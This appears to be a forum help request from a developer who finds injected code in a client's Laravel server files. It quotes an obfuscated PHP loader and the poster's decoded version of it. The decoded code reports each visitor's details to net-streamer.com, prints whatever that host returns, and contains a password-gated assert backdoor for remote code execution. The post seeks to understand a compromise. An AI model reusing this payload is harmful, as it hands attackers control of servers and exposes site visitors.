New code added on server inside laravel framework

I was doing a project for a client. After a few days of finishing and uploading on the server, my client showed me errors occurring. When I checked the files I found a extra piece of code added in CheckForMaintenanceMode.php file inside

vendor/laravel/framework/illuminate/foundation/http/middleware

which is

    //###==###
error_reporting(0); 
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("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"));'));
//###==###

After some basic decoding I found the following code written

if (isset($ibv))
{
    echo $ibv;
}
else
{
    if(!empty($_COOKIE["client_check"]))die($_COOKIE["client_check"]);

    if(!isset($c_["HTTP_ACCEPT_CHARSET"]))
    {
        $temp = dirname(__FILE__)."/ch";$charset = file_get_contents($temp);
        if (!$charset  && !isset($_GET["charset"]))
        {
            $str = file_get_contents("http://".$_SERVER["HTTP_HOST"]."/?charset=1");
            if(preg_match("/windows-1251/i", $str)){$charset = "windows-1251";
            }
            elseif(preg_match("/utf-8/i", $str))
            {
                $charset = "utf-8";
            }
            else
            {
                $charset = "windows-1251";
            }
            $handle = fopen($temp, "w+");
            fwrite($handle, $charset);
            fclose($handle);
        }
        else
        {
            $charset = "utf-8";
        }
        $c0 = $charset;
    }
    else
    {
        $c0=$c_["HTTP_ACCEPT_CHARSET"];
    }
    if(function_exists("curl_init"))
    {
        $c1=curl_init("http://net-streamer.com/get.php?d=".urlencode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&u=".urlencode($_SERVER["HTTP_USER_AGENT"])."&c=".$c0."&i=1&ip=".$_SERVER["REMOTE_ADDR"]."&h=".md5("069a5edfc9e75c4abf03b0608636fe46".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"].$_SERVER["HTTP_USER_AGENT"].$c0."1"));
        curl_setopt($c1,42,false);
        curl_setopt($c1,19913,true);
        $ibv =  curl_exec($c1);
        curl_close($c1);
    }
    elseif(ini_get("allow_url_fopen")==1)
    {
        $ibv = file_get_contents("http://net-streamer.com/get.php?d=".urlencode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&u=".urlencode($_SERVER["HTTP_USER_AGENT"])."&c=".$c0."&i=1&ip=".$_SERVER["REMOTE_ADDR"]."&h=".md5("069a5edfc9e75c4abf03b0608636fe46".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"].$_SERVER["HTTP_USER_AGENT"].$c0."1"));
    }
    if (isset($ibv))
    {
        echo $ibv;
    }
    if(isset($_REQUEST["p"]) && $_REQUEST["p"] == "85bc6cfb")
    {
    @assert($_REQUEST["c"]);
    }

}

But I do not understand what it does and why is it there. I also saw same type code added inside public/index.php.

Can some one please tell me why is it added and what it does?